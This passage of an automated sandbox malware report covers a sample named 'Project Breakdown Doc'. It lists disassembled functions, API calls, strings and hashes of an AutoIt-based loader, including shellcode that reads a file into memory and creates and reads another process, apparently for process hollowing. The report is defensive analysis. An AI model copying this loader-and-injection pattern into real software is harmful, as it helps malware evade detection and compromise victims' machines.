                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 52ec3352c64637b9462f1bca3860305fab80060f73352f50bdc6115a90b62eaf
                                                  • Instruction ID: bc198d673808ddbc49c6404a2408eb2ffc25fac443b35af96a65092f44a1ae06
                                                  • Opcode Fuzzy Hash: 52ec3352c64637b9462f1bca3860305fab80060f73352f50bdc6115a90b62eaf
                                                  • Instruction Fuzzy Hash: 6F21F971940304EFEB109FB4EC49B9D7BB5FB08721F10412AE508E63A0D7B696659FA8
                                                  Function 00C43633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 767 c43633-c43681 769 c436e1-c436e3 767->769 770 c43683-c43686 767->770 769->770 773 c436e5 769->773 771 c436e7 770->771 772 c43688-c4368f 770->772 777 c436ed-c436f0 771->777 778 c7d31c-c7d34a call c511d0 call c511f3 771->778 774 c43695-c4369a 772->774 775 c4375d-c43765 PostQuitMessage 772->775 776 c436ca-c436d2 DefWindowProcW 773->776 779 c436a0-c436a2 774->779 780 c7d38f-c7d3a3 call ca2a16 774->780 783 c43711-c43713 775->783 782 c436d8-c436de 776->782 784 c43715-c4373c SetTimer RegisterWindowMessageW 777->784 785 c436f2-c436f3 777->785 814 c7d34f-c7d356 778->814 786 c43767-c43776 call c44531 779->786 787 c436a8-c436ad 779->787 780->783 805 c7d3a9 780->805 783->782 784->783 788 c4373e-c43749 CreatePopupMenu 784->788 791 c7d2bf-c7d2c2 785->791 792 c436f9-c4370c KillTimer call c444cb call c43114 785->792 786->783 794 c7d374-c7d37b 787->794 795 c436b3-c436b8 787->795 788->783 799 c7d2c4-c7d2c6 791->799 800 c7d2f8-c7d317 MoveWindow 791->800 792->783 794->776 802 c7d381-c7d38a call c9817e 794->802 803 c436be-c436c4 795->803 804 c4374b-c4375b call c445df 795->804 808 c7d2e7-c7d2f3 SetFocus 799->808 809 c7d2c8-c7d2cb 799->809 800->783 802->776 803->776 803->814 804->783 805->776 808->783 809->803 810 c7d2d1-c7d2e2 call c511d0 809->810 810->783 814->776 818 c7d35c-c7d36f call c444cb call c443db 814->818 818->776
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00C436D2
                                                  • KillTimer.USER32(?,00000001), ref: 00C436FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C4371F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4372A
                                                  • CreatePopupMenu.USER32 ref: 00C4373E
                                                  • PostQuitMessage.USER32(00000000), ref: 00C4375F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 6661e10f9071c84a3c369017494eabe7c14c389a1b74c779008deee515daa47e
                                                  • Instruction ID: 6b37b9429e8574886283568647548e1ee65e8f8ef2de2a989daf2c57c4b0e79c
                                                  • Opcode Fuzzy Hash: 6661e10f9071c84a3c369017494eabe7c14c389a1b74c779008deee515daa47e
                                                  • Instruction Fuzzy Hash: 8341F5B1200286ABDF145B34DD09BBD3665FB80340F140129F96AC63E2CAA0DE61A775
                                                  Function 00C43778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3513169116
                                                  • Opcode ID: a10de6ade1a656b5e79fa1caabf225fcbb7a38260d0e49043a51c038eff8de3c
                                                  • Instruction ID: 3490279ce98aaf86b605a9808c042e487d2a5c02bae822757298954dc5d30417
                                                  • Opcode Fuzzy Hash: a10de6ade1a656b5e79fa1caabf225fcbb7a38260d0e49043a51c038eff8de3c
                                                  • Instruction Fuzzy Hash: 6DA14B729102699ADF04EBA1CC96EEEB778FF54300F14052AF416B7192DF749A09EB60
                                                  Function 00C439E7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 942 c439e7-c43a57 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C43A15
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43A36
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00C43A4A
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00C43A53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                  • API String ID: 1584632944-3928557897
                                                  • Opcode ID: e5ecdbeecbd73ced6e01e4abd9ccfb4a9e5d64854c40f344f43b6bd4cca93872
                                                  • Instruction ID: 81d1a8d9c7972c81b08a622b0ad3e6f79ab09176604df2b8bfd79fee00795f0a
                                                  • Opcode Fuzzy Hash: e5ecdbeecbd73ced6e01e4abd9ccfb4a9e5d64854c40f344f43b6bd4cca93872
                                                  • Instruction Fuzzy Hash: 16F0B771641390BAEA211727AC4DF6B2E7ED7C6F50B00412EB908E2260C6A55861DAB4
                                                  Function 017825E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 943 17825e0-178268e call 1780000 946 1782695-17826bb call 17834f0 CreateFileW 943->946 949 17826bd 946->949 950 17826c2-17826d2 946->950 951 178280d-1782811 949->951 958 17826d9-17826f3 VirtualAlloc 950->958 959 17826d4 950->959 952 1782853-1782856 951->952 953 1782813-1782817 951->953 955 1782859-1782860 952->955 956 1782819-178281c 953->956 957 1782823-1782827 953->957 962 1782862-178286d 955->962 963 17828b5-17828ca 955->963 956->957 964 1782829-1782833 957->964 965 1782837-178283b 957->965 960 17826fa-1782711 ReadFile 958->960 961 17826f5 958->961 959->951 966 1782718-1782758 VirtualAlloc 960->966 967 1782713 960->967 961->951 968 178286f 962->968 969 1782871-178287d 962->969 970 17828da-17828e2 963->970 971 17828cc-17828d7 VirtualFree 963->971 964->965 972 178284b 965->972 973 178283d-1782847 965->973 974 178275a 966->974 975 178275f-178277a call 1783740 966->975 967->951 968->963 976 178287f-178288f 969->976 977 1782891-178289d 969->977 971->970 972->952 973->972 974->951 983 1782785-178278f 975->983 979 17828b3 976->979 980 17828aa-17828b0 977->980 981 178289f-17828a8 977->981 979->955 980->979 981->979 984 1782791-17827c0 call 1783740 983->984 985 17827c2-17827d6 call 1783550 983->985 984->983 990 17827d8 985->990 991 17827da-17827de 985->991 990->951 993 17827ea-17827ee 991->993 994 17827e0-17827e4 CloseHandle 991->994 995 17827fe-1782807 993->995 996 17827f0-17827fb VirtualFree 993->996 994->993 995->946 995->951 996->995
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017826B1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017828D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction ID: ad3e5df76b4e35f1cdb3b4d47de3c767d1fc94c90100a26fdb03dc96bfa4ee99
                                                  • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction Fuzzy Hash: 51A10774E40209EBDF14EFA4C998BAEFBB5BF48305F208159E601BB281D7759A41CF94
                                                  Function 017823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1074 17823b0-17824e1 call 1780000 call 17822a0 CreateFileW 1081 17824e8-17824f8 1074->1081 1082 17824e3 1074->1082 1085 17824fa 1081->1085 1086 17824ff-1782519 VirtualAlloc 1081->1086 1083 1782598-178259d 1082->1083 1085->1083 1087 178251b 1086->1087 1088 178251d-1782534 ReadFile 1086->1088 1087->1083 1089 1782538-1782572 call 17822e0 call 17812a0 1088->1089 1090 1782536 1088->1090 1095 178258e-1782596 ExitProcess 1089->1095 1096 1782574-1782589 call 1782330 1089->1096 1090->1083 1095->1083 1096->1095
                                                  APIs
                                                    • Part of subcall function 017822A0: Sleep.KERNELBASE(000001F4), ref: 017822B1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017824D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: BGC6A1Z7E4DYRGMSRGX7LW
                                                  • API String ID: 2694422964-3683455260
                                                  • Opcode ID: 370017c673ebc7764f548e06ee64b09841e1aae4fbfa7eec407e45c30c8cf9e9
                                                  • Instruction ID: dfb3150f94ec29bc42ddae04dd31aee20b05b3341b41221d688a2e7a1db142f4
                                                  • Opcode Fuzzy Hash: 370017c673ebc7764f548e06ee64b09841e1aae4fbfa7eec407e45c30c8cf9e9
                                                  • Instruction Fuzzy Hash: E3519270D44289EAEF11D7A4D818BEEFBB4AF19305F104199E6097B2C1D6B90B44CB65
                                                  Function 00C4410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1098 c4410d-c44123 1099 c44200-c44204 1098->1099 1100 c44129-c4413e call c47b76 1098->1100 1103 c44144-c44164 call c47d2c 1100->1103 1104 c7d5dd-c7d5ec LoadStringW 1100->1104 1107 c7d5f7-c7d60f call c47c8e call c47143 1103->1107 1108 c4416a-c4416e 1103->1108 1104->1107 1118 c4417e-c441fb call c63020 call c4463e call c62ffc Shell_NotifyIconW call c45a64 1107->1118 1119 c7d615-c7d633 call c47e0b call c47143 call c47e0b 1107->1119 1110 c44174-c44179 call c47c8e 1108->1110 1111 c44205-c4420e call c481a7 1108->1111 1110->1118 1111->1118 1118->1099 1119->1118
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C7D5EC
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • _memset.LIBCMT ref: 00C4418D
                                                  • _wcscpy.LIBCMT ref: 00C441E1
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C441F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: 714e8f46e16d16d0b15dd3114be56de5cf86cc2ee87a06094f0ecea669b08f1e
                                                  • Instruction ID: 0cb10c4a14d61cc2f6454b7fc149dab50c278cd71946f6de5c65c3345984f8f2
                                                  • Opcode Fuzzy Hash: 714e8f46e16d16d0b15dd3114be56de5cf86cc2ee87a06094f0ecea669b08f1e
                                                  • Instruction Fuzzy Hash: 4A31AD71408314AEE725EB60DC86FDF77E8BF44300F20461AF199921A1EB74A658D7A6
                                                  Function 00C469CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1133 c469ca-c469f1 call c44f3d 1136 c469f7-c46a05 call c44f3d 1133->1136 1137 c7e45a-c7e46a call ca97e5 1133->1137 1136->1137 1142 c46a0b-c46a11 1136->1142 1141 c7e46f-c7e471 1137->1141 1143 c7e473-c7e476 call c44faa 1141->1143 1144 c7e490-c7e4d8 call c60ff6 1141->1144 1146 c46a17-c46a39 call c46bec 1142->1146 1147 c7e47b-c7e48a call ca4534 1142->1147 1143->1147 1152 c7e4fd 1144->1152 1153 c7e4da-c7e4e4 1144->1153 1147->1144 1157 c7e4ff-c7e512 1152->1157 1156 c7e4f8-c7e4f9 1153->1156 1158 c7e4e6-c7e4f5 1156->1158 1159 c7e4fb 1156->1159 1160 c7e689-c7e68c call c62f95 1157->1160 1161 c7e518 1157->1161 1158->1156 1159->1157 1164 c7e691-c7e69a call c44faa 1160->1164 1163 c7e51f-c7e522 call c475e0 1161->1163 1167 c7e527-c7e549 call c45f12 call ca768b 1163->1167 1170 c7e69c-c7e6ac call c47776 call c45efb 1164->1170 1176 c7e55d-c7e567 call ca7675 1167->1176 1177 c7e54b-c7e558 1167->1177 1186 c7e6b1-c7e6e1 call c9fcb1 call c6106c call c62f95 call c44faa 1170->1186 1184 c7e581-c7e58b call ca765f 1176->1184 1185 c7e569-c7e57c 1176->1185 1179 c7e650-c7e660 call c4766f 1177->1179 1179->1167 1188 c7e666-c7e670 call c474bd 1179->1188 1196 c7e59f-c7e5a9 call c45f8a 1184->1196 1197 c7e58d-c7e59a 1184->1197 1185->1179 1186->1170 1195 c7e675-c7e683 1188->1195 1195->1160 1195->1163 1196->1179 1203 c7e5af-c7e5c7 call c9fc4d 1196->1203 1197->1179 1208 c7e5ea-c7e5ed 1203->1208 1209 c7e5c9-c7e5e8 call c47f41 call c45a64 1203->1209 1211 c7e5ef-c7e60a call c47f41 call c46999 call c45a64 1208->1211 1212 c7e61b-c7e61e 1208->1212 1232 c7e60b-c7e619 call c45f12 1209->1232 1211->1232 1214 c7e620-c7e629 call c9fb6e 1212->1214 1215 c7e63e-c7e641 call ca7621 1212->1215 1214->1186 1225 c7e62f-c7e639 call c6106c 1214->1225 1222 c7e646-c7e64f call c6106c 1215->1222 1222->1179 1225->1167 1232->1222
                                                  APIs
                                                    • Part of subcall function 00C44F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44F6F
                                                  • _free.LIBCMT ref: 00C7E68C
                                                  • _free.LIBCMT ref: 00C7E6D3
                                                    • Part of subcall function 00C46BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C46D0D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: 5f40bda0f49e4fd1dc9f4826fe829a9684c4537f13f4df6a13d3389f0a83fa27
                                                  • Instruction ID: 6824603ec770bb5dec294ab9dcd673748eb305257e3c1efbd853e66c4a659128
                                                  • Opcode Fuzzy Hash: 5f40bda0f49e4fd1dc9f4826fe829a9684c4537f13f4df6a13d3389f0a83fa27
                                                  • Instruction Fuzzy Hash: F1916072910219EFCF14EFA4CC919EDB7B5FF19314F148469F815AB291EB30AA05DB50
                                                  Function 00C435B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C435A1,SwapMouseButtons,00000004,?), ref: 00C435D4
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C435A1,SwapMouseButtons,00000004,?,?,?,?,00C42754), ref: 00C435F5
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00C435A1,SwapMouseButtons,00000004,?,?,?,?,00C42754), ref: 00C43617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 8b38c7efb84a5e5c281cbe83a6c485c4c914e8febee85af8519fb0799d191433
                                                  • Instruction ID: 11ac367e6405ae5b5a56701a97c1d956dabbc8dd40953a665e9d25254b8ac79e
                                                  • Opcode Fuzzy Hash: 8b38c7efb84a5e5c281cbe83a6c485c4c914e8febee85af8519fb0799d191433
                                                  • Instruction Fuzzy Hash: 0E115771610249BFDB209F64DC80EEEBBB9FF84740F128469F805D7210E2719F419BA4
                                                  Function 017812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01781A5B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01781AF1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                  • String ID:
                                                  • API String ID: 2438371351-0
                                                  • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction ID: 01d54b3fa1162e1cc06a745d0329e84b191c7672c206ff822cfcf4cfd76fecbe
                                                  • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                  • Instruction Fuzzy Hash: 91622930A54218DBEB24DFA4C850BDEB772EF58300F5091A9D20DEB394E7799E81CB59
                                                  Function 00C6493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                  • String ID:
                                                  • API String ID: 2782032738-0
                                                  • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction ID: e62bb23017469e316f93dcb6ee4cab9eecd9298bca57d8bb722c7dfb9a7ae43f
                                                  • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                  • Instruction Fuzzy Hash: 8141B575640606AFDF3CDEA9C8C09AF7BAAEF80360B24817DE865C7641D7709E419B44
                                                  Function 00C473E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7EE62
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00C7EEAC
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                    • Part of subcall function 00C609D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C609F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 2a5dc7221fda8143605e2167582831c9bad3e286a2e2ec9de7910da0e20bd1ae
                                                  • Instruction ID: 2bbc89e5f52b4b0ef2ac34558b8d908cee59067b362389526e121e729a5d484f
                                                  • Opcode Fuzzy Hash: 2a5dc7221fda8143605e2167582831c9bad3e286a2e2ec9de7910da0e20bd1ae
                                                  • Instruction Fuzzy Hash: FF210571A1028C9BCF11DF94C845BEE7BF8AF49300F00805AE408F7281DBB44A899FA1
                                                  Function 00CA9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00CA9B82
                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CA9B99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Temp$FileNamePath
                                                  • String ID: aut
                                                  • API String ID: 3285503233-3010740371
                                                  • Opcode ID: 37339a53de63a91ee903217ecdfdb7549b75eb66b05e5e061ee84ec34261153d
                                                  • Instruction ID: c2595821313a878e2c2e01c0202c5e392c9b5ede9f3b692eca1f58dac1345fae
                                                  • Opcode Fuzzy Hash: 37339a53de63a91ee903217ecdfdb7549b75eb66b05e5e061ee84ec34261153d
